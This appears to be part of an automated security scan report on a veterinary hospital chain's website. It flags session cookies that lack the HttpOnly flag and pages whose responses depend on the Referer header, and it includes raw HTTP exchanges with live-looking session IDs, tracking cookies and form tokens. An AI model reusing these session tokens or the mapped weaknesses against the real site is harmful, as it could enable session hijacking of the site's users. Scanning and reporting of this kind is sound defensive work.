User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

5.3. http://www.vcahospitals.com/main/offer previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=3qhitggrmrfo3b1eptve2npsb6; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

5.4. http://www.vcahospitals.com/main/offer/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.vcahospitals.com
Path:	/main/offer/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=9fa7nr5r6l675dmq1d4gnmpmh2; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

5.5. http://www.vcahospitals.com/main/offer/thank-you.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.vcahospitals.com
Path:	/main/offer/thank-you.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=mu2hdob1gobie78vsadtqvdr76; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

5.6. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=ujbf7feteup2muqgmimolpdqs6; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=00dafb5b745078c195d9d4bb9a0d322c&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d989effced4fd802b60795345890a7d8f%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d32a72466f5237a34daf28231fdde613d%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%25253faltphone%25253d%252526ampm1%25253dAM%252526ampm2%25253dAM%252526ampm3%25253dAM%252526appt_type%25253dappt%252526client%25253dcurrent%252526date1%25253d%252526date2%25253d%252526date3%25253d%252526doctor%25253d%252526email%25253d%252526fname%25253d%252526guid%25253d%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526reason%25253d%252526referer%25253d%252526source%25253dnew-york-veterinary-hospital%252526submit%25253dRequest%25252bAn%25252bAppointment%252526time1%25253d%252526time2%25253d%252526time3%25253d%252526token%25253d69ad90c98185c3bfbf109c1ee7f2ceae%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fnew-york-veterinary-hospital%2525252fappt.html%2525253faltphone%2525253d%25252526ampm1%2525253dAM%25252526ampm2%2525253dAM%25252526ampm3%2525253dAM%25252526appt_type%2525253dappt%25252526client%2525253dcurrent%25252526date1%2525253d%25252526date2%2525253d%25252526date3%2525253d%25252526doctor%2525253d%25252526email%2525253d%25252526fname%2525253d%25252526guid%2525253d%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526reason%2525253d%25252526referer%2525253d%25252526source%2525253dnew-york-veterinary-hospital%25252526submit%2525253dRequest%2525252bAn%2525252bAppointment%25252526time1%2525253d%25252526time2%2525253d%25252526time3%2525253d%25252526token%2525253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fnew-york-veterinary-hospital%252525252fappt.html%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)% HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

6. Referer-dependent response previous next
There are 5 instances of this issue:

/hanson/appt.html
/main/offer
/main/offer/
/main/offer/thank-you.html
/marshfield/appt.html

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

6.1. http://www.vcahospitals.com/hanson/appt.html previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.vcahospitals.com
Path:	/hanson/appt.html

Request 1

GET /hanson/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/hanson
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.18.10.1299326665

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:45:41 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 20870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="token" id="token" value="da3b15eadd9ef1b522fdccad42853c5c" />
           <input type="hidden" name="referer" id="referer" value="http://www.vcahospitals.com/hanson" />
           <input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/appt.html" />
           <input type="hidden" name="ipaddress" id="ipaddress" value="173.193.214.243" />
           <input type="hidden" name="useragent" id="useragent" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13" />
           <input type="hidden" name="guid" id="guid" value="" />
           <input type="hidden" name="source" id="source" value="hanson" />
           <input type="hidden" name="appt_type" value="appt" />
       </form>
<p><span class="required"><strong>Important Notice:</strong></span><br />Do not use the appointment form in case of an emergency. Call us right away.</p><p>We will call you back to confirm your appointment within one business day during operating hours. Need to change your appointment? Just call us 24 hours before your scheduled time.</p><p>We respect your privacy and will not share your information with other parties. For more information, see the <a href="http://www.vcahospitals.com/hanson/privacy-policy.html" title="VCA Privacy Policy">VCA Privacy Policy</a>.</p>        
       <script type="text/javascript">
if(typeof(_gat)!='object')document.write('<sc'+'ript src="http'+
(document.location.protocol=='https:'?'s://ssl':'://www')+
'.google-analytics.com/ga.js"></sc'+'ript>')</script>
<script type="text/javascript">
try {
var gwoTracker=_gat._getTracker("UA-8482760-2");
gwoTracker._trackPageview("/1639539707/test");
}catch(err){}</script>

                   </div>
                   <div class="nav-page">
<h3>3 simple steps to set <br />up an appointment <br />for your pet:</h3>
                       <div id="pictogram"><img src="http://www.vcahospitals.co
...[SNIP]...

Request 2

GET /hanson/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.18.10.1299326665

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:17 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 20836

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="token" id="token" value="d06ff4a968334fca7610b3fb80c4f351" />
           <input type="hidden" name="referer" id="referer" value="" />
           <input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/appt.html" />
           <input type="hidden" name="ipaddress" id="ipaddress" value="173.193.214.243" />
           <input type="hidden" name="useragent" id="useragent" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13" />
           <input type="hidden" name="guid" id="guid" value="" />
           <input type="hidden" name="source" id="source" value="hanson" />
           <input type="hidden" name="appt_type" value="appt" />
       </form>
<p><span class="required"><strong>Important Notice:</strong></span><br />Do not use the appointment form in case of an emergency. Call us right away.</p><p>We will call you back to confirm your appointment within one business day during operating hours. Need to change your appointment? Just call us 24 hours before your scheduled time.</p><p>We respect your privacy and will not share your information with other parties. For more information, see the <a href="http://www.vcahospitals.com/hanson/privacy-policy.html" title="VCA Privacy Policy">VCA Privacy Policy</a>.</p>        
       <script type="text/javascript">
if(typeof(_gat)!='object')document.write('<sc'+'ript src="http'+
(document.location.protocol=='https:'?'s://ssl':'://www')+
'.google-analytics.com/ga.js"></sc'+'ript>')</script>
<script type="text/javascript">
try {
var gwoTracker=_gat._getTracker("UA-8482760-2");
gwoTracker._trackPageview("/1639539707/test");
}catch(err){}</script>

                   </div>
                   <div class="nav-page">
<h3>3 simple steps to set <br />up an appointment <br />for your pet:</h3>
                       <div id="pictogram"><img src="http://www.vcahospitals.com/hanson/image/hospital-main.jpg"
...[SNIP]...

6.2. http://www.vcahospitals.com/main/offer previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.vcahospitals.com
Path:	/main/offer

Request 1

GET /main/offer?&optin=1&guid=2505B0C6-B6AA-4144-878F-54873D353284 HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:15:50 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14427

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="token" id="token" value="120e7c22790ed42734da72210579f877" />
           <input type="hidden" name="guid" id="guid" value="04BE5E58-E0C0-4263-A98D-0DE95E71916F" />
           <input type="hidden" name="referer" id="referer" value="http://www.vcahospitals.com/main/offer/thank-you.html?" />
           <input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/main/offer?&optin=1&guid=2505B0C6-B6AA-4144-878F-54873D353284" />
           <input type="hidden" name="ipaddress" id="ipaddress" value="173.193.214.243" />
           <input type="hidden" name="useragent" id="useragent" value="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" />
           <input type="hidden" name="formtype" id="formtype" value="CORP" />
           <input type="hidden" name="newmex" id="newmex" value="0" />
           <input type="hidden" name="date" value="1307084400" />
           <input type="hidden" name="tollfree" value="866-825-8416" />
       </form>

           <p id="p-newmex"><span>Free initial health exam for new clients only. Not to be combined with any other offer. Not good toward boarding,
               grooming, prescription and non-prescription medication, and retail items. Not good toward emergency and/or specialty veterinary services.
               Coupon good for up to two pets (dogs or cats only) per household. Check with your nearest VCA hospital for other types of pets.
               Redeemable only at a general practice VCA Animal Hospital.
               <strong>Not valid in New Mexico.</strong>
           For pet owners who are aged 18 and older.</span>
           <span class="hidden">Complimentary initial health exam for new clients only. Not to be combined with any other offer. Not good toward boarding,
               grooming, prescription and non-prescription medication, and retail items. Not good toward emergency and/or specialty veterinary services.
               Coupon good for up to two pets (dogs or cats only) per household. Check with your nearest VCA hospital for other types of pets.
               Redeemable only at a general practice VCA Animal Hospital. For pet owners who are a
...[SNIP]...

Request 2

GET /main/offer?&optin=1&guid=2505B0C6-B6AA-4144-878F-54873D353284 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:02 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14373

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="token" id="token" value="8ad122b6cac330ce58aeae1307770c96" />
           <input type="hidden" name="guid" id="guid" value="5525091E-C2A5-4BDF-9EF4-DDEB8FA6F02A" />
           <input type="hidden" name="referer" id="referer" value="" />
           <input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/main/offer?&optin=1&guid=2505B0C6-B6AA-4144-878F-54873D353284" />
           <input type="hidden" name="ipaddress" id="ipaddress" value="173.193.214.243" />
           <input type="hidden" name="useragent" id="useragent" value="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" />
           <input type="hidden" name="formtype" id="formtype" value="CORP" />
           <input type="hidden" name="newmex" id="newmex" value="0" />
           <input type="hidden" name="date" value="1307084400" />
           <input type="hidden" name="tollfree" value="866-825-8416" />
       </form>

           <p id="p-newmex"><span>Free initial health exam for new clients only. Not to be combined with any other offer. Not good toward boarding,
               grooming, prescription and non-prescription medication, and retail items. Not good toward emergency and/or specialty veterinary services.
               Coupon good for up to two pets (dogs or cats only) per household. Check with your nearest VCA hospital for other types of pets.
               Redeemable only at a general practice VCA Animal Hospital.
               <strong>Not valid in New Mexico.</strong>
           For pet owners who are aged 18 and older.</span>
           <span class="hidden">Complimentary initial health exam for new clients only. Not to be combined with any other offer. Not good toward boarding,
               grooming, prescription and non-prescription medication, and retail items. Not good toward emergency and/or specialty veterinary services.
               Coupon good for up to two pets (dogs or cats only) per household. Check with your nearest VCA hospital for other types of pets.
               Redeemable only at a general practice VCA Animal Hospital. For pet owners who are aged 18 and older.</span></p>
           <p><a href="#" id="a-
...[SNIP]...

6.3. http://www.vcahospitals.com/main/offer/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.vcahospitals.com
Path:	/main/offer/

Request 1

GET /main/offer/?&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:15:47 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14620

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="token" id="token" value="d5ecc1c3a03e80630a5e977de6327e6b" />
           <input type="hidden" name="guid" id="guid" value="7AB761AA-BB4E-4595-9EAD-6769D4B9ED93" />
           <input type="hidden" name="referer" id="referer" value="http://www.vcahospitals.com/main/offer/thank-you.html?" />
           <input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/main/offer/?&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F" />
           <input type="hidden" name="ipaddress" id="ipaddress" value="173.193.214.243" />
           <input type="hidden" name="useragent" id="useragent" value="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" />
           <input type="hidden" name="formtype" id="formtype" value="CORP" />
           <input type="hidden" name="newmex" id="newmex" value="0" />
           <input type="hidden" name="date" value="1307084400" />
           <input type="hidden" name="tollfree" value="866-825-8416" />
       </form>

           <p id="p-newmex"><span>Free initial health exam for new clients only. Not to be combined with any other offer. Not good toward boarding,
               grooming, prescription and non-prescription medication, and retail items. Not good toward emergency and/or specialty veterinary services.
               Coupon good for up to two pets (dogs or cats only) per household. Check with your nearest VCA hospital for other types of pets.
               Redeemable only at a general practice VCA Animal Hospital.
               <strong>Not valid in New Mexico.</strong>
           For pet owners who are aged 18 and older.</span>
           <span class="hidden">Complimentary initial health exam for new clients only. Not to be combined with any other offer. Not good toward boarding,
               grooming, prescription and non-prescription medication, and retail items. Not good toward emergency and/or specialty veterinary services.
               Coupon good for up to two pets (dogs or cats only) per household. Check with your nearest VCA hospital for other types of pets.

...[SNIP]...

Request 2

GET /main/offer/?&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:15:56 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14566

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="token" id="token" value="20c0de32fbe87b3c8d9722a47a87717c" />
           <input type="hidden" name="guid" id="guid" value="80BF4DBB-79D6-4BFF-8E38-11A178A784A9" />
           <input type="hidden" name="referer" id="referer" value="" />
           <input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/main/offer/?&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F" />
           <input type="hidden" name="ipaddress" id="ipaddress" value="173.193.214.243" />
           <input type="hidden" name="useragent" id="useragent" value="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" />
           <input type="hidden" name="formtype" id="formtype" value="CORP" />
           <input type="hidden" name="newmex" id="newmex" value="0" />
           <input type="hidden" name="date" value="1307084400" />
           <input type="hidden" name="tollfree" value="866-825-8416" />
       </form>

           <p id="p-newmex"><span>Free initial health exam for new clients only. Not to be combined with any other offer. Not good toward boarding,
               grooming, prescription and non-prescription medication, and retail items. Not good toward emergency and/or specialty veterinary services.
               Coupon good for up to two pets (dogs or cats only) per household. Check with your nearest VCA hospital for other types of pets.
               Redeemable only at a general practice VCA Animal Hospital.
               <strong>Not valid in New Mexico.</strong>
           For pet owners who are aged 18 and older.</span>
           <span class="hidden">Complimentary initial health exam for new clients only. Not to be combined with any other offer. Not good toward boarding,
               grooming, prescription and non-prescription medication, and retail items. Not good toward emergency and/or specialty veterinary services.
               Coupon good for up to two pets (dogs or cats only) per household. Check with your nearest VCA hospital for other types of pets.
               Redeemable only at a general practice VCA Animal H
...[SNIP]...

6.4. http://www.vcahospitals.com/main/offer/thank-you.html previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.vcahospitals.com
Path:	/main/offer/thank-you.html

Request 1

POST /main/offer/thank-you.html? HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 522

fname=&lname=&addr=&city=&state=FL&zip=&phone=&email=&optin=on&pettype&other=&petname=&petage=&variant=&submit=Get+FREE+Coupon&token=8d1014910f5e3f05f9cdcf25a9c679bb&guid=EB9CB843-C06F-419A-A604-9D3CF
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:15:41 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3579
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<a href="http://www.vcahospitals.com/main/offer/?&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F">Offer Form</a></p></div></div><div class="nav-footer">
   <ul>
<li><a href="/main/directory.html" title="Other VCA Locations">Other VCA Locations</a></li><li>|</li>
<li><a href="/main/charities.html" title="VCA Charities">VCA Charities</li><li>|</li>

<li><a href="/main/about.php" title="About VCA">About VCA</a></li><li>|</li>
<li><a href="/main/contact.php" title="Contact Us">Contact Us</a></li><li>|</li>
<li><a href="/main/copyright.php" title="Copyright">Copyright</a></li><li>|</li>
<li><a href="/main/privacy-policy.php" title="Privacy Policy">Privacy Policy</a></li><li>|</li>
<li><a href="/main/sitemap.php" title="Site Map">Site Map</a></li> <li>|</li>
<li><a href="http://www.facebook.com/VCAAnimalHospitals" target="_blank">Like us on Facebook  <img src="/img/logo-facebook-like.png" style="vertical-align:bottom;" /></a></li>

</ul>
</div></div></div>
           <div class="pop-layer">
               <a href="javascript: void(0);" class="pop-close">close [x]</a>
               <div class="pop-content"></div>
           </div>
   </div>
       <script type="text/javascript">
           var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
           document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
       </script>
       <script type="text/javascript">
           try {
               var pageTracker = _gat._getTracker("UA-8482760-1");
               pageTracker._trackPageview();
           } catch(err) {}
       </script>
       <div class="pop-shim"></div>
       <div class="pop-modal">
           <a href="javascript: void(0);" class="pop-close">CLOSE</a>
           <div class="pop-content"></div>
       </div>
</body>

Request 2

POST /main/offer/thank-you.html? HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 522

